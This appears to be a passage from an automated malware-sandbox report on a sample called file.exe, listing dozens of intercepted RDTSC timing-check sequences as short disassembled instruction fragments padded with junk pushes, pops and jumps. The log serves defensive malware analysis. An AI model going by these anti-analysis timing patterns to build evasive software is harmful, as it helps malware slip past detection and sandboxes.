                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A308B second address: 11A30AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FB6CC860F2Eh 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A30AB second address: 11A30C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925501h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A30C2 second address: 11A30C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A30C8 second address: 11A30CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A3AC8 second address: 11A3AD8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push esi 0x00000008 pop esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7BCB second address: 11A7BCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7BCF second address: 11A7BD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7BD3 second address: 11A7BD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7BD9 second address: 11A7BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB6CC860F34h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7BF5 second address: 11A7C23 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 je 00007FB6CD9254F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jns 00007FB6CD92550Fh 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A6F77 second address: 11A6FA2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB6CC860F34h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007FB6CC860F32h 0x00000014 jg 00007FB6CC860F26h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A6FA2 second address: 11A6FA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A6FA6 second address: 11A6FB2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FB6CC860F2Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7102 second address: 11A711F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CD925509h 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A711F second address: 11A7133 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F30h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A737D second address: 11A7393 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB6CD9254FBh 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A7393 second address: 11A7397 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A74A8 second address: 11A74B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A77B5 second address: 11A77E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F2Bh 0x00000007 push edi 0x00000008 jmp 00007FB6CC860F36h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edi 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A77E2 second address: 11A77EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11A77EA second address: 11A77F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF21E second address: 11AF222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AF222 second address: 11AF232 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB6CC860F26h 0x00000008 jnp 00007FB6CC860F26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD254 second address: 11AD260 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD260 second address: 11AD26B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD26B second address: 11AD274 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD3B4 second address: 11AD3BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AD7A3 second address: 11AD7A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11ADD84 second address: 11ADD88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AECC8 second address: 11AECDE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007FB6CD9254F6h 0x0000000b pop ecx 0x0000000c jnp 00007FB6CD9254FEh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B46D3 second address: 11B46F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FB6CC860F38h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B46F3 second address: 11B46F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B46F8 second address: 11B4716 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F2Bh 0x00000007 push eax 0x00000008 jmp 00007FB6CC860F2Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B4716 second address: 11B4733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FB6CD925501h 0x00000011 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8640 second address: 11B865F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c pop ebx 0x0000000d pushad 0x0000000e push ecx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ecx 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 jno 00007FB6CC860F26h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11145F3 second address: 1114603 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FB6CD9254F8h 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B77B4 second address: 11B77B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B77B9 second address: 11B77C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B78FE second address: 11B7904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B7904 second address: 11B7909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B7909 second address: 11B790E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B7E87 second address: 11B7EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6CD925505h 0x00000009 jmp 00007FB6CD925501h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B7EB3 second address: 11B7EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B7EBC second address: 11B7EC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B7EC0 second address: 11B7EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 jl 00007FB6CC860F40h 0x0000000e jmp 00007FB6CC860F34h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8090 second address: 11B8097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8384 second address: 11B8388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B8388 second address: 11B83C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925507h 0x00000007 jmp 00007FB6CD925504h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jno 00007FB6CD9254F6h 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11B83C3 second address: 11B83C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE4E6 second address: 11BE4F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6CD9254FBh 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE4F5 second address: 11BE4F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE4F9 second address: 11BE51A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB6CD925508h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE51A second address: 11BE526 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FB6CC860F26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEC08 second address: 11BEC11 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BED51 second address: 11BED57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BED57 second address: 11BED93 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925504h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FB6CD925505h 0x0000000f jng 00007FB6CD9254F6h 0x00000015 jng 00007FB6CD9254F6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BED93 second address: 11BED98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BED98 second address: 11BEDC7 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FB6CD92550Fh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007FB6CD9254FAh 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BEDC7 second address: 11BEDDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB6CC860F2Bh 0x00000009 jp 00007FB6CC860F26h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF2E9 second address: 11BF303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB6CD925503h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BF303 second address: 11BF319 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB6CC860F2Dh 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BFA3A second address: 11BFA3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BFA3E second address: 11BFA60 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CC860F38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BFA60 second address: 11BFA74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925500h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE077 second address: 11BE07B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE07B second address: 11BE09A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD9254FDh 0x00000007 jmp 00007FB6CD9254FAh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11BE09A second address: 11BE0A4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C74B5 second address: 11C74B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3079 second address: 11D3083 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FB6CC860F26h 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D3083 second address: 11D30B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925502h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007FB6CD9254F6h 0x00000012 pushad 0x00000013 popad 0x00000014 js 00007FB6CD9254F6h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d pushad 0x0000001e jl 00007FB6CD9254FCh 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2AB8 second address: 11D2ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2ABE second address: 11D2AC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2C39 second address: 11D2C3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D2C3F second address: 11D2C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4E85 second address: 11D4E8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4E8B second address: 11D4EC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6CD925500h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FB6CD925507h 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007FB6CD9254F6h 0x0000001b popad 0x0000001c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11D4EC4 second address: 11D4EEF instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB6CC860F28h 0x00000008 pushad 0x00000009 jmp 00007FB6CC860F33h 0x0000000e jmp 00007FB6CC860F2Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD63D second address: 11DD643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11DD643 second address: 11DD65D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jmp 00007FB6CC860F30h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E8544 second address: 11E854A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11E854A second address: 11E854F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EF978 second address: 11EF983 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EF983 second address: 11EF988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE48A second address: 11EE48E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE48E second address: 11EE4A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB6CC860F31h 0x0000000f rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EE8E9 second address: 11EE8F3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FB6CD9254F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EEA55 second address: 11EEA59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11EF6AD second address: 11EF6CC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FB6CD9254FDh 0x00000008 pop ecx 0x00000009 jc 00007FB6CD925502h 0x0000000f jno 00007FB6CD9254F6h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1D96 second address: 11F1D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1D9A second address: 11F1D9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F1D9E second address: 11F1DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB6CC860F30h 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F55A7 second address: 11F55B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FB6CD925502h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F55B4 second address: 11F55BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F55BA second address: 11F55C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jl 00007FB6CD9254F6h 0x0000000c rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F7239 second address: 11F723D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F723D second address: 11F726C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 jmp 00007FB6CD925501h 0x0000000d jmp 00007FB6CD925500h 0x00000012 push eax 0x00000013 push edx 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11F726C second address: 11F7270 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1111056 second address: 1111086 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FB6CD925501h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 jmp 00007FB6CD9254FCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
